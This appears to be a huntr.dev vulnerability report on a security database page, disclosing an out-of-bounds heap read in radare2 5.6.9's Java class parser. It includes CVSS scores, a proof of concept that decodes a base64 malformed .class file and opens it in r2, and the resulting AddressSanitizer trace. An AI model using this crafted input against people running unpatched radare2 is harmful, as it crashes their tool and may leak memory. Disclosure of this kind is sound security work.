Lucene search
Bet4it229A2E0D-9E5C-402F-9A24-57FA2EB1AAA7HistoryApr 23, 2022 - 3:00 p.m.
Out-of-bounds Read in r_bin_java_constant_value_attr_new function
2022-04-2315:00:19
bet4it
www.huntr.dev
9
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:N/A:P
0.001 Low
EPSS
Percentile
39.6%
- Description
Out-of-bounds (OOB) read vulnerability exists in r_bin_java_constant_value_attr_new function in Radare2 5.6.9.
This is similar with CVE-2022-0518 and CVE-2022-0521
- Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
- Proof of Concept
# build the radare2 with address sanitizer
./sys/sanitize.sh
echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEADUNvbnN0YW50VmFsdWUBABpDVkVfZm91bmRfYnlfZ2l0aHViL2JldDRpdAEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > constant.class
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A constant.class
- ASAN
=================================================================
==608767==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cf7 at pc 0x7f99a12e1a71 bp 0x7ffee735f9b0 sp 0x7ffee735f9a0
READ of size 1 at 0x602000063cf7 thread T0
#0 0x7f99a12e1a70 in r_bin_java_constant_value_attr_new /src/radare2/shlr/java/class.c:3562
#1 0x7f99a12c9919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
#2 0x7f99a12c91e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
#3 0x7f99a12cd16c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f99a12cf25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f99a12ce9f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f99a12dbbe8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f999ae0f8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f999ac45989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f999ac3a1c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f999abf51ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f999abf6060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f999d0f2edd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f999d0f5c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f99a60f4c10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x56540c2ff81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f99a54df30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
#17 0x7f99a54df3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
#18 0x56540c2ff1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)
0x602000063cf7 is located 0 bytes to the right of 7-byte region [0x602000063cf0,0x602000063cf7)
allocated by thread T0 here:
#0 0x7f99a727afb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x7f99a12c76a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
#2 0x7f99a12c91a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
#3 0x7f99a12cd16c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f99a12cf25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f99a12ce9f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f99a12dbbe8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f999ae0f8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f999ac45989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f999ac3a1c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f999abf51ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f999abf6060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f999d0f2edd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f999d0f5c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f99a60f4c10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x56540c2ff81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f99a54df30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:3562 in r_bin_java_constant_value_attr_new
Shadow bytes around the buggy address:
0x0c0480004740: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 00 07
0x0c0480004750: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 01
0x0c0480004760: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 03
0x0c0480004770: fa fa fd fd fa fa 05 fa fa fa 00 04 fa fa fd fd
0x0c0480004780: fa fa 05 fa fa fa 00 06 fa fa 05 fa fa fa 05 fa
=>0x0c0480004790: fa fa 05 fa fa fa 05 fa fa fa fd fd fa fa[07]fa
0x0c04800047a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==608767==ABORTING
Related
huntr
huntr
Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function
2022-04-23 15:09:28
Heap-based Buffer Overflow in radareorg/radare2
2022-01-23 03:04:38
in radareorg/radare2
2022-01-22 14:40:31
cve
cve
osv
osv
ubuntucve
ubuntucve
debiancve
debiancve
veracode
veracode
Denial Of Service (DoS)
2022-12-26 00:42:27
Heap-based Buffer Overflow
2022-12-26 17:15:35
Denial Of Service (DoS)
2022-02-09 04:05:59
prion
prion
Out-of-bounds
2022-04-24 21:15:00
Heap overflow
2022-02-08 21:15:00
Design/Logic Flaw
2022-02-08 21:15:00
alpinelinux
alpinelinux
cnvd
cnvd
Radareorg Radare2 Buffer Overflow Vulnerability (CNVD-2022-13391)
2022-02-11 00:00:00
Radareorg Radare2 Buffer Overflow Vulnerability (CNVD-2022-13394)
2022-02-11 00:00:00
fedora
fedora
[SECURITY] Fedora 35 Update: radare2-5.6.4-1.fc35
2022-03-11 14:47:54
[SECURITY] Fedora 36 Update: radare2-5.6.4-1.fc36
2022-03-26 15:39:36
openvas
openvas
Fedora: Security Advisory for radare2 (FEDORA-2022-85b277e748)
2022-03-27 00:00:00
Fedora: Security Advisory for radare2 (FEDORA-2022-7db9e7bb5b)
2022-03-23 00:00:00
Mageia: Security Advisory (MGASA-2022-0440)
2022-11-28 00:00:00
mageia
mageia
Updated radare2/rizin packages fix security vulnerability
2022-11-27 23:51:49
7.1 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:N/A:P
0.001 Low
EPSS
Percentile
39.6%
Related for 229A2E0D-9E5C-402F-9A24-57FA2EB1AAA7